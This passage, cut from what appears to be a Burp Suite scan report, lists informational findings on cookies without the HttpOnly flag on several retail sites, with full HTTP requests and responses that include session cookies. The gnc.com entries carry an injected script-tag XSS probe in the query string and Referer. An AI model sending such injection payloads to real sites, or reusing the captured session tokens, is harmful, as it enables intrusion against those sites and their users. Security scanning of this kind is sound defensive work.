Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:04:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: bnses=new~false&ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:04:13 GMT; Path=/
Set-Cookie: bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:04:13 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0


13.154. http://www.bluenile.com/fbc/setStatus.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /fbc/setStatus.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fbc/setStatus.html?_=1305510944826 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnses=new~false&ver~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:38 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; Domain=.bluenile.com; Path=/
Vary: Accept-Encoding
Content-Length: 0


13.155. http://www.brookstone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_pers=%20s_nr%3D1305510909785%7C1368582909785%3B%20s_lv%3D1305510909788%7C1400118909788%3B%20s_lv_s%3DFirst%2520Visit%7C1305512709788%3B%20s_vs%3D1%7C1305512709800%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]

Response

HTTP/1.1 200 OK
ETag: W/"52413-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: image/x-icon
Content-Length: 52413
Date: Mon, 16 May 2011 02:03:15 GMT
Set-Cookie: TS657dfa=57e630f1ac3975343e628615fd50d784e754034066e5db8e4dd085e360ac0ec57d901b7a; Path=/

..............h.......(....... ...............................00/.EED.............""!.....**).++*.HHH.997.221.443.............]]\.....            .....%%$.....##".RRQ.gff.''%...........-.................III...
...[SNIP]...

13.156. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /floating-daybed-with-canopy-pool-lounger.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241 HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543287875%3B; s_sess=%20s_evar2%3Dworldlandingpage_outdoor_living%257Ccxtopnav1fdt%257Coutdoor_living%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Doutdoor%25252520living%2525253Aoutdoor%25252520%25252526amp%2525253B%25252520patio%25252520furniture%2525253Aoutdoor%25252520wood%25252520furniture%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html%2525253Fbkiid%2525253DsubCategoryLandingPage%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 13:35:49 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:35:48 GMT
Set-Cookie: TS657dfa=3e167d73b2313d63b52b8915c1fc32dbe754034066e5db8e4dd0fe0560ac0ec56e0e0800; Path=/
Content-Length: 102983


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

13.157. http://www.brookstone.com/formhandlerservlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /formhandlerservlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /formhandlerservlet HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241
Origin: http://www.brookstone.com
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543302812%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dproduct%25252520detail%2525253AOASIS%25252520LOUNGER%25252528706978p%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/imageservlet%2525253FwebImageName%2525253DaddToCart.gif%25252526languageId%2525253DEN%25252526imageVer%2525253D6704%252526ot%25253DIMAGE%3B
Content-Length: 82

formName=addToCartAjax&currentNodeLink=%2FproductDetail.jsp&quantity_11370241=1&_=

Response

HTTP/1.1 200 OK
Set-Cookie: cart_items_2=2; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: cart_total_2=$4579.89; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: account_firstName_2=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: tempVer23_2=e6194578fc481261b537e7bc9f385fa6; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: cart_items_2=2; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: cart_total_2=$4579.89; Expires=Thu, 26-May-2011 10:35:59 GMT
Set-Cookie: account_firstName_2=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: tempVer23_2=e6194578fc481261b537e7bc9f385fa6; Expires=Thu, 26-May-2011 10:35:59 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 1123
Date: Mon, 16 May 2011 10:35:58 GMT
Set-Cookie: TS657dfa=9b7bc19cfee8ac65b1bc9a09721745d0e754034066e5db8e4dd0fe0e60ac0ec56e0e08002bc503d7966a55bfe3e40749ce11a16d7dcfd30671256871cf7ecac63a8e4fc52bc503d7966a55bfe3e40749ce11a16d7dcfd30671256871cf7ecac63a8e4fc5; Path=/

{"status":"results","omniture":{"events":"scAdd","products":";706978p"},"cart":{"couponTotal":"$0.00","currentProductShortName":"Oasis Lounger","currentProductSku":"706978","giftWrapTotal":"$0.00","gr
...[SNIP]...

13.158. http://www.brookstone.com/outdoor-living.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /outdoor-living.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /outdoor-living.html?bkiid=homePage|CXTopNav1FDT|outdoor_living HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512915786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 05:06:39 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:06:39 GMT
Set-Cookie: TS657dfa=9e8001d74d4e447255a75f517db728f1e754034066e5db8e4dd086af60ac0ec57d901b7a; Path=/
Content-Length: 118287


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

13.159. http://www.brookstone.com/shoppingCart.jsp.vr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /shoppingCart.jsp.vr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shoppingCart.jsp.vr HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543306797%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:35:57 GMT
Set-Cookie: TS657dfa=02ff95a5e2b4b81f69fff5bd65984d7ce754034066e5db8e4dd0fe0d60ac0ec56e0e0800; Path=/
Content-Length: 82708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

13.160. https://www.brookstone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543325583%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20ttc%3D1305541525579%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
ETag: W/"52413-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: image/x-icon
Content-Length: 52413
Date: Mon, 16 May 2011 10:36:08 GMT
Set-Cookie: TS657dfa=0b3c2fa6061f93d60514f85a08946e42e754034066e5db8e4dd0fe1860ac0ec56e0e0800; Path=/

..............h.......(....... ...............................00/.EED.............""!.....**).++*.HHH.997.221.443.............]]\.....            .....%%$.....##".RRQ.gff.''%...........-.................III...
...[SNIP]...

13.161. https://www.brookstone.com/formhandlerservlet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /formhandlerservlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: http://www.brookstone.com/shoppingCart.jsp.vr
Cache-Control: max-age=0
Origin: http://www.brookstone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dcheckout%2525253Acart%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/shoppingCart.jsp.vr%25252523_4%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B
Content-Length: 21

quantity_1343815425=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:05 GMT
Set-Cookie: TS657dfa=2eff89a1b2ef875f19c572c08f6b8043e754034066e5db8e4dd0fe1660ac0ec56e0e0800; Path=/
Content-Length: 92549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

13.162. http://www.gnc.com/home/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1 HTTP/1.1
Host: www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=p2GCNRCTz3d1h2C5cBh1h4qPJL2n70PJ4F6vnvf26JpKDT2qs10P!672921789; __g_c=w%3A0; mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543402575%7C1308135402575%3B%20gpv_p6%3DHome%2520Page%7C1305545202577%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]; __utma=1.1693801748.1305543186.1305543186.1305543186.1; __utmb=1.3.10.1305543186; __utmc=1; __utmz=1.1305543186.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:57:22 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:22 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115169


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...

13.163. http://www.gnc.com/recommendationpixel/user.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /recommendationpixel/user.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recommendationpixel/user.jsp?uid=1096126108310753991 HTTP/1.1
Host: www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://html.aggregateknowledge.com/iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1&senduuid=1
Cookie: JSESSIONID=p2GCNRCTz3d1h2C5cBh1h4qPJL2n70PJ4F6vnvf26JpKDT2qs10P!672921789; __g_c=w%3A0; mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543444162%7C1308135444162%3B%20gpv_p6%3DHome%2520Page%7C1305545244163%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]; __utma=1.1693801748.1305543186.1305543186.1305543186.1; __utmb=1.3.10.1305543186; __utmc=1; __utmz=1.1305543186.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; browser_id=125602265854

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:57:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: recommendationUid=1096126108310753991; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 0


13.164. http://www.guitarcenter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?CJAID=10453836&CJPID=2537521 HTTP/1.1
Host: www.guitarcenter.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; CjPID=2537521; CjAID=10453836; ref=; ref_d=5/15/2011 9:40:10 PM; source=4ACJWXX2; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; UNICASOURCE=4ACJWXX2; UNICASOURCEL=4ACJWXX2; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; mbox=check#true#1305510080|session#1305510019406-714170#1305511880|PC#1305510019406-714170.17#1308102028; fcspersisthp-slider=2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:53:36 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
SN: 28
X-Powered-By: ASP.NET
Set-Cookie: CjPID=2537521; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: CjAID=10453836; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: source=4ACJWXX2; path=/
Set-Cookie: UNICASOURCE=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: UNICASOURCEL=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Vary: Accept-Encoding
Content-Length: 217584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...

13.165. http://www.imiclk.com/cgi/r.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro; CH=24785,53c1h,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c1h,33114,00000,18653,53bro,24782,53c1h,32619,00000,32620,00000; RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
